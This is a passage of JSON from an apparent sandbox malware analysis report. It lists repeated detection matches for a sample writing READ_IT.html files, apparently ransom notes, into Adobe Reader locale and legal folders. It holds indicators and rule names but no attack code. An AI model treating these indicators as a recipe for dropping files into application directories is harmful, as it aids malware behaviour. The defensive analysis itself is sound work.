"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14956", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14966", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15064", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15074", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15172", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15182", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15280", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15290", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15398", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15496", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15506", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15614", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15712", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15722", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15820", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15830", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15928", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_15938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16036", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16056", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16066", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16076", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16086", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16096", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16106", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16116", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16126", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", 